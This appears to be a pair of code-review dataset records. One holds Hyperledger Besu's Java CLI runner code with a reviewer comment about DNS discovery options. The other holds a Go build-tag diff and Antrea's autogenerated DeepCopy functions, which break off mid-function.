EthNetworkConfig ethNetworkConfig, final int maxPeers, final String p2pAdvertisedHost, final String p2pListenInterface, final int p2pListenPort, final GraphQLConfiguration graphQLConfiguration, final JsonRpcConfiguration jsonRpcConfiguration, final WebSocketConfiguration webSocketConfiguration, final ApiConfiguration apiConfiguration, final MetricsConfiguration metricsConfiguration, final Optional<PermissioningConfiguration> permissioningConfiguration, final Collection<EnodeURL> staticNodes, final Path pidPath) { checkNotNull(runnerBuilder); permissioningConfiguration.ifPresent(runnerBuilder::permissioningConfiguration); final ObservableMetricsSystem metricsSystem = this.metricsSystem.get(); final Runner runner = runnerBuilder .vertx(vertx) .besuController(controller) .p2pEnabled(p2pEnabled) .natMethod(natMethod) .natManagerServiceName(unstableNatOptions.getNatManagerServiceName()) .natMethodFallbackEnabled(unstableNatOptions.getNatMethodFallbackEnabled()) .discovery(peerDiscoveryEnabled) .ethNetworkConfig(ethNetworkConfig) .p2pAdvertisedHost(p2pAdvertisedHost) .p2pListenInterface(p2pListenInterface) .p2pListenPort(p2pListenPort) .maxPeers(maxPeers) .limitRemoteWireConnectionsEnabled(isLimitRemoteWireConnectionsEnabled) .fractionRemoteConnectionsAllowed( Fraction.fromPercentage(maxRemoteConnectionsPercentage).getValue()) .randomPeerPriority(randomPeerPriority) .networkingConfiguration(unstableNetworkingOptions.toDomainObject()) .graphQLConfiguration(graphQLConfiguration) .jsonRpcConfiguration(jsonRpcConfiguration) .webSocketConfiguration(webSocketConfiguration) .apiConfiguration(apiConfiguration) .pidPath(pidPath) .dataDir(dataDir()) .bannedNodeIds(bannedNodeIds) .metricsSystem(metricsSystem) .metricsConfiguration(metricsConfiguration) .staticNodes(staticNodes) .identityString(identityString) .besuPluginContext(besuPluginContext) .autoLogBloomCaching(autoLogBloomCachingEnabled) .ethstatsUrl(unstableEthstatsOptions.getEthstatsUrl()) .ethstatsContact(unstableEthstatsOptions.getEthstatsContact()) .storageProvider(keyValueStorageProvider(keyValueStorageName)) .forkIdSupplier(() -> besuController.getProtocolManager().getForkIdAsBytesList()) .build(); addShutdownHook(runner); runner.start(); runner.awaitStop(); } protected Vertx createVertx(final VertxOptions vertxOptions) { return Vertx.vertx(vertxOptions); } private VertxOptions createVertxOptions(final MetricsSystem metricsSystem) { return new VertxOptions() .setMetricsOptions( new MetricsOptions() .setEnabled(true) .setFactory(new VertxMetricsAdapterFactory(metricsSystem))); } private void addShutdownHook(final Runner runner) { Runtime.getRuntime() .addShutdownHook( new Thread( () -> { try { besuPluginContext.stopPlugins(); runner.close(); LogManager.shutdown(); } catch (final Exception e) { logger.error("Failed to stop Besu"); } })); } // Used to discover the default IP of the client. // Loopback IP is used by default as this is how smokeTests require it to be // and it's probably a good security behaviour to default only on the localhost. private InetAddress autoDiscoverDefaultIP() { if (autoDiscoveredDefaultIP != null) { return autoDiscoveredDefaultIP; } autoDiscoveredDefaultIP = InetAddress.getLoopbackAddress(); return autoDiscoveredDefaultIP; } private EthNetworkConfig updateNetworkConfig(final NetworkName network) { final EthNetworkConfig.Builder builder = new EthNetworkConfig.Builder(EthNetworkConfig.getNetworkConfig(network)); // custom genesis file use comes with specific default values for the genesis // file itself // but also for the network id and the bootnodes list. if (genesisFile != null) { // noinspection ConstantConditions network is not always null but injected by // PicoCLI if used if (this.network != null) { // We check if network option was really provided by user and not only looking // at the // default value. // if user provided it and provided the genesis file option at the same time, it // raises a // conflict error throw new ParameterException( this.commandLine, "--network option and --genesis-file option can't be used at the same time. Please " + "refer to CLI reference for more details about this constraint."); } builder.setGenesisConfig(genesisConfig()); if (networkId == null) { // if no network id option is defined on the CLI we have to set a default value // from the // genesis file. // We do the genesis parsing only in this case as we already have network id // constants // for known networks to speed up the process. // Also we have to parse the genesis as we don't already have a parsed version // at this // stage. // If no chain id is found in the genesis as it's an optional, we use mainnet // network id. try { builder.setNetworkId( getGenesisConfigFile() .getConfigOptions(genesisConfigOverrides) .getChainId() .orElse(EthNetworkConfig.getNetworkConfig(MAINNET).getNetworkId())); } catch (final DecodeException e) { throw new ParameterException( this.commandLine, String.format("Unable to parse genesis file %s.", genesisFile), e); } catch (final ArithmeticException e) { throw new ParameterException( this.commandLine, "No networkId specified and chainId in " + "genesis file is too large to be used as a networkId"); } } if (bootNodes == null) { // We default to an empty bootnodes list if the option is not provided on CLI // because // mainnet bootnodes won't work as the default value for a custom genesis, // so it's better to have an empty list as default value that forces to create a // custom one // than a useless one that may make user think that it can work when it can't. builder.setBootNodes(new ArrayList<>()); } builder.setDnsDiscoveryUrl(null); } if (networkId != null) { builder.setNetworkId(networkId); } if (bootNodes != null) { if (!peerDiscoveryEnabled) { logger.warn("Discovery disabled: bootnodes will be ignored."); } try { final List<EnodeURL> listBootNodes = bootNodes.stream() .filter(value -> !value.isEmpty()) .map(url -> EnodeURL.fromString(url, getEnodeDnsConfiguration())) .collect(Collectors.toList()); DiscoveryConfiguration.assertValidBootnodes(listBootNodes); builder.setBootNodes(listBootNodes); } catch (final IllegalArgumentException e) { throw new ParameterException(commandLine, e.getMessage()); } } return builder.build(); } private GenesisConfigFile getGenesisConfigFile() { return GenesisConfigFile.fromConfig(genesisConfig()); } private String genesisConfig() { try { return Resources.toString(genesisFile.toURI().toURL(), UTF_8); } catch (final IOException e) { throw new ParameterException( this.commandLine, String.format("Unable to load genesis file %s.", genesisFile), e); } } // dataDir() is public because it is accessed by subcommands public Path dataDir() { return dataPath.toAbsolutePath(); } private Path pluginsDir() { final String pluginsDir = System.getProperty("besu.plugins.dir"); if (pluginsDir == null) { return new File(System.getProperty("besu.home", "."), "plugins").toPath(); } else { return new File(pluginsDir).toPath(); } } @VisibleForTesting NodeKey buildNodeKey() { return new NodeKey(securityModule()); } private SecurityModule securityModule() { return securityModuleService .getByName(securityModuleName) .orElseThrow(() -> new RuntimeException("Security Module not found: " + securityModuleName)) .get(); } private File nodePrivateKeyFile() { return Optional.ofNullable(nodePrivateKeyFile) .orElseGet(() -> KeyPairUtil.getDefaultKeyFile(dataDir())); } private String rpcHttpAuthenticationCredentialsFile() { final String filename = rpcHttpAuthenticationCredentialsFile; if (filename != null) { RpcAuthFileValidator.validate(commandLine, filename, "HTTP"); } return filename; } private String rpcWsAuthenticationCredentialsFile() { final String filename = rpcWsAuthenticationCredentialsFile; if (filename != null) { RpcAuthFileValidator.validate(commandLine, filename, "WS"); } return filename; } private String getDefaultPermissioningFilePath() { return dataDir() + System.getProperty("file.separator") + DefaultCommandValues.PERMISSIONING_CONFIG_LOCATION; } public MetricsSystem getMetricsSystem() { return metricsSystem.get(); } private Set<EnodeURL> loadStaticNodes() throws IOException { final Path staticNodesPath; if (staticNodesFile != null) { staticNodesPath = staticNodesFile.toAbsolutePath(); if (!staticNodesPath.toFile().exists()) { throw new ParameterException( commandLine, String.format("Static nodes file %s does not exist", staticNodesPath)); } } else { final String staticNodesFilename = "static-nodes.json"; staticNodesPath = dataDir().resolve(staticNodesFilename); } logger.info("Static Nodes file = {}", staticNodesPath); return StaticNodesParser.fromPath(staticNodesPath, getEnodeDnsConfiguration()); } public BesuExceptionHandler exceptionHandler() { return new BesuExceptionHandler(this::getLogLevel); } public EnodeDnsConfiguration getEnodeDnsConfiguration() { if (enodeDnsConfiguration == null) { enodeDnsConfiguration = unstableDnsOptions.toDomainObject(); } return enodeDnsConfiguration; } private void checkPortClash() { getEffectivePorts().stream() .filter(Objects::nonNull) .filter(port -> port > 0) .forEach( port -> { if (!allocatedPorts.add(port)) { throw new ParameterException( commandLine, "Port number '" + port + "' has been specified multiple times. Please review the supplied configuration."); } }); } /** * * Gets the list of effective ports (ports that are enabled). * * @return The list of effective ports */ private List<Integer> getEffectivePorts() { final List<Integer> effectivePorts = new ArrayList<>(); addPortIfEnabled(effectivePorts, p2pPort, p2pEnabled); addPortIfEnabled(effectivePorts, graphQLHttpPort, isGraphQLHttpEnabled); addPortIfEnabled(effectivePorts, rpcHttpPort, isRpcHttpEnabled); addPortIfEnabled(effectivePorts, rpcWsPort, isRpcWsEnabled); addPortIfEnabled(effectivePorts, metricsPort, isMetricsEnabled); addPortIfEnabled(effectivePorts, metricsPushPort, isMetricsPushEnabled); addPortIfEnabled(effectivePorts, stratumPort, iStratumMiningEnabled); return effectivePorts; } /** * Adds port in the passed list only if enabled. * * @param ports The list of ports * @param port The port value * @param enabled true if enabled, false otherwise */ private void addPortIfEnabled( final List<Integer> ports, final Integer port, final boolean enabled) { if (enabled) { ports.add(port); } } private void checkGoQuorumGenesisConfig() { if (genesisFile != null) { if (readGenesisConfigOptions().isQuorum() && !isGoQuorumCompatibilityMode) { throw new IllegalStateException( "Cannot use GoQuorum genesis file without GoQuorum privacy enabled"); } } } private void checkGoQuorumCompatibilityConfig(final EthNetworkConfig ethNetworkConfig) { if (isGoQuorumCompatibilityMode) { if (genesisFile == null) { throw new ParameterException( this.commandLine, "--genesis-file must be specified if GoQuorum compatibility mode is enabled."); } final GenesisConfigOptions genesisConfigOptions = readGenesisConfigOptions(); // this static flag is read by the RLP decoder GoQuorumOptions.goQuorumCompatibilityMode = true; if (!genesisConfigOptions.isQuorum()) { throw new IllegalStateException( "GoQuorum compatibility mode (enabled) can only be used if genesis file has 'isQuorum' flag set to true."); } if (!minTransactionGasPrice.isZero()) { throw new ParameterException( this.commandLine, "--min-gas-price must be set to zero if GoQuorum compatibility is enabled in the genesis config."); } if (ensureGoQuorumCompatibilityModeNotUsedOnMainnet(genesisConfigOptions, ethNetworkConfig)) { throw new ParameterException( this.commandLine, "GoQuorum compatibility mode (enabled) cannot be used on Mainnet."); } } } private static boolean ensureGoQuorumCompatibilityModeNotUsedOnMainnet( final GenesisConfigOptions genesisConfigOptions, final EthNetworkConfig ethNetworkConfig) { return ethNetworkConfig.getNetworkId().equals(EthNetworkConfig.MAINNET_NETWORK_ID) || genesisConfigOptions .getChainId() .map(chainId -> chainId.equals(EthNetworkConfig.MAINNET_NETWORK_ID)) .orElse(false); } @VisibleForTesting Level getLogLevel() { return logLevel; } private class BesuCommandConfigurationService implements BesuConfiguration { @Override public Path getStoragePath() { return dataDir().resolve(DATABASE_PATH); } @Override public Path getDataPath() { return dataDir(); } @Override public int getDatabaseVersion() { return unstableDataStorageOptions .toDomainObject() .getDataStorageFormat() .getDatabaseVersion(); } } private void instantiateSignatureAlgorithmFactory() { if (SignatureAlgorithmFactory.isInstanceSet()) { return; } Optional<String> ecCurve = getEcCurveFromGenesisFile(); if (ecCurve.isEmpty()) { SignatureAlgorithmFactory.setDefaultInstance(); return; } try { SignatureAlgorithmFactory.setInstance(SignatureAlgorithmType.create(ecCurve.get())); } catch (IllegalArgumentException e) { throw new CommandLine.InitializationException(e.getMessage()); } } private Optional<String> getEcCurveFromGenesisFile() { if (genesisFile == null) { return Optional.empty(); } GenesisConfigOptions options = readGenesisConfigOptions(); return options.getEcCurve(); } }
1
24,919
Hmm... this feels like discovery should come first. perhaps `--discovery-dns-url`? @NicolasMassart any opinions on this or ideas on who it should be run by?
hyperledger-besu
java
@@ -1,3 +1,4 @@ +//go:build !ignore_autogenerated // +build !ignore_autogenerated /*
1
// +build !ignore_autogenerated /* Copyright 2021 Antrea Authors. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. */ // Code generated by controller-gen. DO NOT EDIT. package v1alpha1 import ( "antrea.io/antrea/pkg/apis/crd/v1alpha2" "k8s.io/api/core/v1" "k8s.io/apimachinery/pkg/runtime" apisv1alpha1 "sigs.k8s.io/mcs-api/pkg/apis/v1alpha1" ) // DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil. func (in *ClusterClaim) DeepCopyInto(out *ClusterClaim) { *out = *in out.TypeMeta = in.TypeMeta in.ObjectMeta.DeepCopyInto(&out.ObjectMeta) } // DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new ClusterClaim. func (in *ClusterClaim) DeepCopy() *ClusterClaim { if in == nil { return nil } out := new(ClusterClaim) in.DeepCopyInto(out) return out } // DeepCopyObject is an autogenerated deepcopy function, copying the receiver, creating a new runtime.Object. func (in *ClusterClaim) DeepCopyObject() runtime.Object { if c := in.DeepCopy(); c != nil { return c } return nil } // DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil. func (in *ClusterClaimList) DeepCopyInto(out *ClusterClaimList) { *out = *in out.TypeMeta = in.TypeMeta in.ListMeta.DeepCopyInto(&out.ListMeta) if in.Items != nil { in, out := &in.Items, &out.Items *out = make([]ClusterClaim, len(*in)) for i := range *in { (*in)[i].DeepCopyInto(&(*out)[i]) } } } // DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new ClusterClaimList. func (in *ClusterClaimList) DeepCopy() *ClusterClaimList { if in == nil { return nil } out := new(ClusterClaimList) in.DeepCopyInto(out) return out } // DeepCopyObject is an autogenerated deepcopy function, copying the receiver, creating a new runtime.Object. func (in *ClusterClaimList) DeepCopyObject() runtime.Object { if c := in.DeepCopy(); c != nil { return c } return nil } // DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil. func (in *ClusterCondition) DeepCopyInto(out *ClusterCondition) { *out = *in in.LastTransitionTime.DeepCopyInto(&out.LastTransitionTime) } // DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new ClusterCondition. func (in *ClusterCondition) DeepCopy() *ClusterCondition { if in == nil { return nil } out := new(ClusterCondition) in.DeepCopyInto(out) return out } // DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil. func (in *ClusterSet) DeepCopyInto(out *ClusterSet) { *out = *in out.TypeMeta = in.TypeMeta in.ObjectMeta.DeepCopyInto(&out.ObjectMeta) in.Spec.DeepCopyInto(&out.Spec) in.Status.DeepCopyInto(&out.Status) } // DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new ClusterSet. func (in *ClusterSet) DeepCopy() *ClusterSet { if in == nil { return nil } out := new(ClusterSet) in.DeepCopyInto(out) return out } // DeepCopyObject is an autogenerated deepcopy function, copying the receiver, creating a new runtime.Object. func (in *ClusterSet) DeepCopyObject() runtime.Object { if c := in.DeepCopy(); c != nil { return c } return nil } // DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil. func (in *ClusterSetCondition) DeepCopyInto(out *ClusterSetCondition) { *out = *in in.LastTransitionTime.DeepCopyInto(&out.LastTransitionTime) } // DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new ClusterSetCondition. func (in *ClusterSetCondition) DeepCopy() *ClusterSetCondition { if in == nil { return nil } out := new(ClusterSetCondition) in.DeepCopyInto(out) return out } // DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil. func (in *ClusterSetList) DeepCopyInto(out *ClusterSetList) { *out = *in out.TypeMeta = in.TypeMeta in.ListMeta.DeepCopyInto(&out.ListMeta) if in.Items != nil { in, out := &in.Items, &out.Items *out = make([]ClusterSet, len(*in)) for i := range *in { (*in)[i].DeepCopyInto(&(*out)[i]) } } } // DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new ClusterSetList. func (in *ClusterSetList) DeepCopy() *ClusterSetList { if in == nil { return nil } out := new(ClusterSetList) in.DeepCopyInto(out) return out } // DeepCopyObject is an autogenerated deepcopy function, copying the receiver, creating a new runtime.Object. func (in *ClusterSetList) DeepCopyObject() runtime.Object { if c := in.DeepCopy(); c != nil { return c } return nil } // DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil. func (in *ClusterSetSpec) DeepCopyInto(out *ClusterSetSpec) { *out = *in if in.Members != nil { in, out := &in.Members, &out.Members *out = make([]MemberCluster, len(*in)) copy(*out, *in) } if in.Leaders != nil { in, out := &in.Leaders, &out.Leaders *out = make([]MemberCluster, len(*in)) copy(*out, *in) } } // DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new ClusterSetSpec. func (in *ClusterSetSpec) DeepCopy() *ClusterSetSpec { if in == nil { return nil } out := new(ClusterSetSpec) in.DeepCopyInto(out) return out } // DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil. func (in *ClusterSetStatus) DeepCopyInto(out *ClusterSetStatus) { *out = *in if in.Conditions != nil { in, out := &in.Conditions, &out.Conditions *out = make([]ClusterSetCondition, len(*in)) for i := range *in { (*in)[i].DeepCopyInto(&(*out)[i]) } } if in.ClusterStatuses != nil { in, out := &in.ClusterStatuses, &out.ClusterStatuses *out = make([]ClusterStatus, len(*in)) for i := range *in { (*in)[i].DeepCopyInto(&(*out)[i]) } } } // DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new ClusterSetStatus. func (in *ClusterSetStatus) DeepCopy() *ClusterSetStatus { if in == nil { return nil } out := new(ClusterSetStatus) in.DeepCopyInto(out) return out } // DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil. func (in *ClusterStatus) DeepCopyInto(out *ClusterStatus) { *out = *in if in.Conditions != nil { in, out := &in.Conditions, &out.Conditions *out = make([]ClusterCondition, len(*in)) for i := range *in { (*in)[i].DeepCopyInto(&(*out)[i]) } } } // DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new ClusterStatus. func (in *ClusterStatus) DeepCopy() *ClusterStatus { if in == nil { return nil } out := new(ClusterStatus) in.DeepCopyInto(out) return out } // DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil. func (in *EndpointsExport) DeepCopyInto(out *EndpointsExport) { *out = *in if in.Subsets != nil { in, out := &in.Subsets, &out.Subsets *out = make([]v1.EndpointSubset, len(*in)) for i := range *in { (*in)[i].DeepCopyInto(&(*out)[i]) } } } // DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new EndpointsExport. func (in *EndpointsExport) DeepCopy() *EndpointsExport { if in == nil { return nil } out := new(EndpointsExport) in.DeepCopyInto(out) return out } // DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil. func (in *EndpointsImport) DeepCopyInto(out *EndpointsImport) { *out = *in if in.Subsets != nil { in, out := &in.Subsets, &out.Subsets *out = make([]v1.EndpointSubset, len(*in)) for i := range *in { (*in)[i].DeepCopyInto(&(*out)[i]) } } } // DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new EndpointsImport. func (in *EndpointsImport) DeepCopy() *EndpointsImport { if in == nil { return nil } out := new(EndpointsImport) in.DeepCopyInto(out) return out } // DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil. func (in *ExternalEntityExport) DeepCopyInto(out *ExternalEntityExport) { *out = *in in.ExternalEntitySpec.DeepCopyInto(&out.ExternalEntitySpec) } // DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new ExternalEntityExport. func (in *ExternalEntityExport) DeepCopy() *ExternalEntityExport { if in == nil { return nil } out := new(ExternalEntityExport) in.DeepCopyInto(out) return out } // DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil. func (in *ExternalEntityImport) DeepCopyInto(out *ExternalEntityImport) { *out = *in if in.ExternalEntitySpec != nil { in, out := &in.ExternalEntitySpec, &out.ExternalEntitySpec *out = new(v1alpha2.ExternalEntitySpec) (*in).DeepCopyInto(*out) } } // DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new ExternalEntityImport. func (in *ExternalEntityImport) DeepCopy() *ExternalEntityImport { if in == nil { return nil } out := new(ExternalEntityImport) in.DeepCopyInto(out) return out } // DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil. func (in *MemberCluster) DeepCopyInto(out *MemberCluster) { *out = *in } // DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new MemberCluster. func (in *MemberCluster) DeepCopy() *MemberCluster { if in == nil { return nil } out := new(MemberCluster) in.DeepCopyInto(out) return out } // DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil. func (in *MemberClusterAnnounce) DeepCopyInto(out *MemberClusterAnnounce) { *out = *in out.TypeMeta = in.TypeMeta in.ObjectMeta.DeepCopyInto(&out.ObjectMeta) } // DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new MemberClusterAnnounce. func (in *MemberClusterAnnounce) DeepCopy() *MemberClusterAnnounce { if in == nil { return nil } out := new(MemberClusterAnnounce) in.DeepCopyInto(out) return out } // DeepCopyObject is an autogenerated deepcopy function, copying the receiver, creating a new runtime.Object. func (in *MemberClusterAnnounce) DeepCopyObject() runtime.Object { if c := in.DeepCopy(); c != nil { return c } return nil } // DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil. func (in *MemberClusterAnnounceList) DeepCopyInto(out *MemberClusterAnnounceList) { *out = *in out.TypeMeta = in.TypeMeta in.ListMeta.DeepCopyInto(&out.ListMeta) if in.Items != nil { in, out := &in.Items, &out.Items *out = make([]MemberClusterAnnounce, len(*in)) for i := range *in { (*in)[i].DeepCopyInto(&(*out)[i]) } } } // DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new MemberClusterAnnounceList. func (in *MemberClusterAnnounceList) DeepCopy() *MemberClusterAnnounceList { if in == nil { return nil } out := new(MemberClusterAnnounceList) in.DeepCopyInto(out) return out } // DeepCopyObject is an autogenerated deepcopy function, copying the receiver, creating a new runtime.Object. func (in *MemberClusterAnnounceList) DeepCopyObject() runtime.Object { if c := in.DeepCopy(); c != nil { return c } return nil } // DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil. func (in *RawResourceExport) DeepCopyInto(out *RawResourceExport) { *out = *in if in.Data != nil { in, out := &in.Data, &out.Data *out = make([]byte, len(*in)) copy(*out, *in) } } // DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new RawResourceExport. func (in *RawResourceExport) DeepCopy() *RawResourceExport { if in == nil { return nil } out := new(RawResourceExport) in.DeepCopyInto(out) return out } // DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil. func (in *RawResourceImport) DeepCopyInto(out *RawResourceImport) { *out = *in if in.Data != nil { in, out := &in.Data, &out.Data *out = make([]byte, len(*in)) copy(*out, *in) } } // DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new RawResourceImport. func (in *RawResourceImport) DeepCopy() *RawResourceImport { if in == nil { return nil } out := new(RawResourceImport) in.DeepCopyInto(out) return out } // DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil. func (in *ResourceExport) DeepCopyInto(out *ResourceExport) { *out = *in out.TypeMeta = in.TypeMeta in.ObjectMeta.DeepCopyInto(&out.ObjectMeta) in.Spec.DeepCopyInto(&out.Spec) in.Status.DeepCopyInto(&out.Status) } // DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new ResourceExport. func (in *ResourceExport) DeepCopy() *ResourceExport { if in == nil { return nil } out := new(ResourceExport) in.DeepCopyInto(out) return out } // DeepCopyObject is an autogenerated deepcopy function, copying the receiver, creating a new runtime.Object. func (in *ResourceExport) DeepCopyObject() runtime.Object { if c := in.DeepCopy(); c != nil { return c } return nil } // DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil. func (in *ResourceExportCondition) DeepCopyInto(out *ResourceExportCondition) { *out = *in in.LastTransitionTime.DeepCopyInto(&out.LastTransitionTime) } // DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new ResourceExportCondition. func (in *ResourceExportCondition) DeepCopy() *ResourceExportCondition { if in == nil { return nil } out := new(ResourceExportCondition) in.DeepCopyInto(out) return out } // DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil. func (in *ResourceExportFilter) DeepCopyInto(out *ResourceExportFilter) { *out = *in out.TypeMeta = in.TypeMeta in.ObjectMeta.DeepCopyInto(&out.ObjectMeta) out.Spec = in.Spec out.Status = in.Status } // DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new ResourceExportFilter. func (in *ResourceExportFilter) DeepCopy() *ResourceExportFilter { if in == nil { return nil } out := new(ResourceExportFilter) in.DeepCopyInto(out) return out } // DeepCopyObject is an autogenerated deepcopy function, copying the receiver, creating a new runtime.Object. func (in *ResourceExportFilter) DeepCopyObject() runtime.Object { if c := in.DeepCopy(); c != nil { return c } return nil } // DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil. func (in *ResourceExportFilterList) DeepCopyInto(out *ResourceExportFilterList) { *out = *in out.TypeMeta = in.TypeMeta in.ListMeta.DeepCopyInto(&out.ListMeta) if in.Items != nil { in, out := &in.Items, &out.Items *out = make([]ResourceExportFilter, len(*in)) for i := range *in { (*in)[i].DeepCopyInto(&(*out)[i]) } } } // DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new ResourceExportFilterList. func (in *ResourceExportFilterList) DeepCopy() *ResourceExportFilterList { if in == nil { return nil } out := new(ResourceExportFilterList) in.DeepCopyInto(out) return out } // DeepCopyObject is an autogenerated deepcopy function, copying the receiver, creating a new runtime.Object. func (in *ResourceExportFilterList) DeepCopyObject() runtime.Object { if c := in.DeepCopy(); c != nil { return c } return nil } // DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil. func (in *ResourceExportFilterSpec) DeepCopyInto(out *ResourceExportFilterSpec) { *out = *in } // DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new ResourceExportFilterSpec. func (in *ResourceExportFilterSpec) DeepCopy() *ResourceExportFilterSpec { if in == nil { return nil } out := new(ResourceExportFilterSpec) in.DeepCopyInto(out) return out } // DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil. func (in *ResourceExportFilterStatus) DeepCopyInto(out *ResourceExportFilterStatus) { *out = *in } // DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new ResourceExportFilterStatus. func (in *ResourceExportFilterStatus) DeepCopy() *ResourceExportFilterStatus { if in == nil { return nil } out := new(ResourceExportFilterStatus) in.DeepCopyInto(out) return out } // DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil. func (in *ResourceExportList) DeepCopyInto(out *ResourceExportList) { *out = *in out.TypeMeta = in.TypeMeta in.ListMeta.DeepCopyInto(&out.ListMeta) if in.Items != nil { in, out := &in.Items, &out.Items *out = make([]ResourceExport, len(*in)) for i := range *in { (*in)[i].DeepCopyInto(&(*out)[i]) } } } // DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new ResourceExportList. func (in *ResourceExportList) DeepCopy() *ResourceExportList { if in == nil { return nil } out := new(ResourceExportList) in.DeepCopyInto(out) return out } // DeepCopyObject is an autogenerated deepcopy function, copying the receiver, creating a new runtime.Object. func (in *ResourceExportList) DeepCopyObject() runtime.Object { if c := in.DeepCopy(); c != nil { return c } return nil } // DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil. func (in *ResourceExportSpec) DeepCopyInto(out *ResourceExportSpec) { *out = *in if in.Service != nil { in, out := &in.Service, &out.Service *out = new(ServiceExport) (*in).DeepCopyInto(*out) } if in.Endpoints != nil { in, out := &in.Endpoints, &out.Endpoints *out = new(EndpointsExport) (*in).DeepCopyInto(*out) } if in.ExternalEntity != nil { in, out := &in.ExternalEntity, &out.ExternalEntity *out = new(ExternalEntityExport) (*in).DeepCopyInto(*out) } in.Raw.DeepCopyInto(&out.Raw) } // DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new ResourceExportSpec. func (in *ResourceExportSpec) DeepCopy() *ResourceExportSpec { if in == nil { return nil } out := new(ResourceExportSpec) in.DeepCopyInto(out) return out } // DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil. func (in *ResourceExportStatus) DeepCopyInto(out *ResourceExportStatus) { *out = *in if in.Conditions != nil { in, out := &in.Conditions, &out.Conditions *out = make([]ResourceExportCondition, len(*in)) for i := range *in { (*in)[i].DeepCopyInto(&(*out)[i]) } } } // DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new ResourceExportStatus. func (in *ResourceExportStatus) DeepCopy() *ResourceExportStatus { if in == nil { return nil } out := new(ResourceExportStatus) in.DeepCopyInto(out) return out } // DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil. func (in *ResourceImport) DeepCopyInto(out *ResourceImport) { *out = *in out.TypeMeta = in.TypeMeta in.ObjectMeta.DeepCopyInto(&out.ObjectMeta) in.Spec.DeepCopyInto(&out.Spec) in.Status.DeepCopyInto(&out.Status) } // DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new ResourceImport. func (in *ResourceImport) DeepCopy() *ResourceImport { if in == nil { return nil } out := new(ResourceImport) in.DeepCopyInto(out) return out } // DeepCopyObject is an autogenerated deepcopy function, copying the receiver, creating a new runtime.Object. func (in *ResourceImport) DeepCopyObject() runtime.Object { if c := in.DeepCopy(); c != nil { return c } return nil } // DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil. func (in *ResourceImportClusterStatus) DeepCopyInto(out *ResourceImportClusterStatus) { *out = *in if in.Conditions != nil { in, out := &in.Conditions, &out.Conditions *out = make([]ResourceImportCondition, len(*in)) for i := range *in { (*in)[i].DeepCopyInto(&(*out)[i]) } } } // DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new ResourceImportClusterStatus. func (in *ResourceImportClusterStatus) DeepCopy() *ResourceImportClusterStatus { if in == nil { return nil } out := new(ResourceImportClusterStatus) in.DeepCopyInto(out) return out } // DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil. func (in *ResourceImportCondition) 